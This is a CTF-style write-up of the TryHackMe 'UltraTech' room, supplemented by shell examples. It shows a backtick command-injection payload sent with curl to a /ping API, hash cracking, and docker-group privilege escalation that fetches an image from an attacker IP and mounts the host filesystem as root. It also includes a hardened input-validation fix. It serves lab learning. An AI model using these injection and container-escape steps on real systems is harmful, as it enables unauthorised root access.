UltraTech Solution (TryHackMe-Medium)

UltraTech | Difficulty: Medium

Umut Bayram
5 min read · Apr 7, 2024

📜 Summary

1- Exploit the /ping API endpoint through its ip parameter (command injection).

2- SSH into the machine with credentials recovered by reading a file on the target through that injection.

3- Abuse membership of the docker group to become root.

Enumeration

Let’s start with rustscan to find the open ports on the target.

I will also run nmap, limited to the ports rustscan found, to get service and version information.
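The two-step scan described above, as an added example (not the original writeup’s commands): rustscan does the fast sweep, and its greppable output is turned into the port list nmap’s -p flag expects. The target IP and the rustscan output format (`host -> [p1,p2,...]`) are assumptions; the sample line is constructed.

```shell
# Added example: rustscan sweep, then nmap -sC -sV on only the open ports.
TARGET="${TARGET:-10.10.10.10}"   # assumption: replace with the room's IP

# Turn one line of rustscan's greppable output ("host -> [22,8081,31331]")
# into a comma-separated list for nmap -p. Pure text processing, so it can
# be checked on a constructed line without a live host.
ports_from_rustscan() {
    # $1: one line of `rustscan -g` output
    printf '%s\n' "$1" | sed -n 's/.*\[\(.*\)].*/\1/p' | tr -d ' '
}

# Full pipeline against the target (needs rustscan and nmap installed).
scan_target() {
    line=$(rustscan -a "$TARGET" -g)           # -g: greppable one-liner
    ports=$(ports_from_rustscan "$line")
    [ -n "$ports" ] || { echo "rustscan reported no open ports" >&2; return 1; }
    nmap -sC -sV -p "$ports" "$TARGET"
}

# Constructed sample of the kind of line rustscan prints for this box.
sample='10.10.10.10 -> [22,8081,31331]'
echo "would run: nmap -sC -sV -p $(ports_from_rustscan "$sample") $TARGET"
```

Run `scan_target` once the VPN is up; the function refuses to call nmap with an empty port list, which is the usual way a mistyped target turns into a confusingly empty nmap run.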

Good, now we know the services and their versions. Let’s check the HTTP ones.

Express API and Front End Website

port 8081
port 31331

The website on port 31331 looks like an ordinary company site. Let’s enumerate its directories with gobuster, ffuf or dirsearch; I will use dirsearch for simplicity.

We found a /js directory. Let’s check it.

Yep! We found a JavaScript file that describes the API.

two API endpoints

We found two API endpoints, /ping and /auth. Awesome!

Command Injection

We can send requests to these URLs and intercept them with Burp Suite.

/ping endpoint

When we request the /ping endpoint with the ip parameter set to localhost, the response looks like ping output, so the backend probably runs the ping command in a shell. What if we inject shell commands instead of a valid IP address? I mean that the backend executes something like this:

ping <ip address you gave>

Our goal is to inject something into the <ip address you gave> field. If we can, the backend might return something valuable, because whatever the injected command prints comes back in the same response.

After trying some command injection techniques (it was not straightforward, because the backend filters some characters), I found a way to execute commands.

Source: HackTricks

Backticks are not filtered by the server, so we can use them: the shell runs whatever is between the backticks first and substitutes its output into the command line, so no separator like ; or | is needed.
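A local stand-in for the /ping handler, as an added example (this is not the room’s real backend code): it shows why a backtick payload survives a blocklist that catches the usual separators, and what a handler that does not have the bug looks like. The blocklist contents are an assumption (the page only says "some characters" are filtered and backticks are not), the port 8081 path is taken from the enumeration above, and `echo PING` stands in for the real ping so the script runs offline.

```shell
# Added example: vulnerable vs. hardened handling of the ip parameter.

# Naive blocklist (assumed for illustration): catches the common separators
# but not backticks, which is exactly the gap the writeup exploits.
blocked_by_filter() {
    case "$1" in
        *';'*|*'|'*|*'&'*|*'$('*) return 0 ;;
        *) return 1 ;;
    esac
}

# Vulnerable pattern: the parameter is spliced into a command string that a
# shell parses, so `...` inside it is executed before "ping" ever runs.
vulnerable_ping() {
    sh -c "echo PING $1"         # real code would be: sh -c "ping -c 1 $1"
}

# Hardened pattern: accept only a literal IPv4 address, then pass it as an
# argument. Nothing re-parses the value, so there is nothing to inject into.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}
safe_ping() {
    is_ipv4 "$1" || { echo "rejected: not an IPv4 address" >&2; return 1; }
    echo PING "$1"               # real code would be: ping -c 1 -- "$1"
}

# The request the writeup sends, with the payload URL-encoded by curl.
# $1: target host, $2: command to run inside the backticks (e.g. id, ls, cat file)
send_payload() {
    curl -sG "http://$1:8081/ping" --data-urlencode "ip=127.0.0.1\`$2\`"
}

payload='127.0.0.1`id`'
blocked_by_filter "$payload" && echo "filter caught it" || echo "filter passed: $payload"
vulnerable_ping "$payload"      # prints PING 127.0.0.1uid=... : id ran on the "server"
safe_ping "$payload" || true    # rejected before anything executes
```

`send_payload 10.10.10.10 'ls'` followed by `send_payload 10.10.10.10 'cat <file>'` is the two-request sequence used below; the output of the injected command is glued onto the address in the response, which is why it can look odd at first glance.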

There is a file in the current directory, and it is a database file. Let’s read its contents.

Hmm, that is interesting. The output contains r00t, followed by a string of characters that looks like a hash. We can guess that r00t is a username and the string is the hash of that user’s password, but we may be wrong. Let’s try to crack the hash under this assumption. I will use CrackStation.

Yep! Our assumption was right. But wait! You might be asking: “How did you guess that?!” I am not a genius, calm down :). When I visited the website, I saw a “Who are we?” section listing some names, which are potential usernames.

Don’t forget that clever assumptions are half of hacking.

We now have a username and password. Let’s try to SSH into the machine using these credentials.

Yep, we are in now!

Becoming the ROOT

When we run the id command, we see that we are in the docker group. This means we can run docker commands, which is very powerful for privilege escalation: the Docker daemon runs as root, so anyone who can talk to it can mount the host filesystem into a container and read or write it as root.

While researching I found a privilege escalation technique here. Its proof of concept needs two things: a user who can run docker commands, and the alpine image. Let’s download it from Docker Hub to our local machine and then upload it to the target, since the target has no internet access. After that we build the image. We need to download a Dockerfile and the tar.gz of the image; you can download it from here. After downloading, serve it to the target with python3 -m http.server. Also do not forget to download the POC and upload it to the target.

After executing the POC script on the target machine, it asks for credentials for a new root user. We can enter anything, but we must enter the password we set when it asks for it.

commands we will execute in order
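The same docker-group escalation with the plain host-mount trick instead of the new-user POC, as an added example (not the writeup’s commands or the linked POC): the attacker ships the alpine image as a tarball because the box has no internet, the target loads it, and a bind mount of / into the container gives a root shell on the host filesystem. The attacker IP, port and image tag are assumptions.

```shell
# Added example: offline docker-group escalation via a host bind mount.
ATTACKER="${ATTACKER:-10.9.0.1}"     # assumption: attacker's VPN address
IMAGE="${IMAGE:-alpine:latest}"      # any small image works

# Is the named group in a space-separated group list (as printed by id -nG)?
# Taking the list as an argument keeps the check testable without root.
in_group() {
    # $1: group name, $2: group list
    printf '%s\n' "$2" | tr ' ' '\n' | grep -qx "$1"
}

# Attacker side: pull once, save as a tarball, serve it over HTTP.
package_image_attacker() {
    docker pull "$IMAGE"
    docker save "$IMAGE" -o alpine.tar
    python3 -m http.server 8000
}

# Target side: fetch and load the tarball, then start a container with the
# host's / mounted at /mnt. The daemon is root, so the mount is too; chroot
# into it and you are root on the host, no new user or password required.
escape_target() {
    wget "http://$ATTACKER:8000/alpine.tar" -O /tmp/alpine.tar
    docker load -i /tmp/alpine.tar
    docker run --rm -it -v /:/mnt "$IMAGE" chroot /mnt sh
}

if in_group docker "$(id -nG)"; then
    echo "docker group present: run escape_target for a root shell"
else
    echo "current user is not in the docker group"
fi
```

Inside the chroot, `cat /root/.ssh/id_rsa` answers the room’s question directly; without the chroot the same file is at /mnt/root/.ssh/id_rsa from the container.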

Now we are root. The TryHackMe question asks for the first nine characters of the root user’s SSH private key. Let’s go to the /root directory. There is a hidden directory named .ssh; when we cd into it, we see the id_rsa file, which holds the RSA private key.

Thanks for reading! I will continue writing!
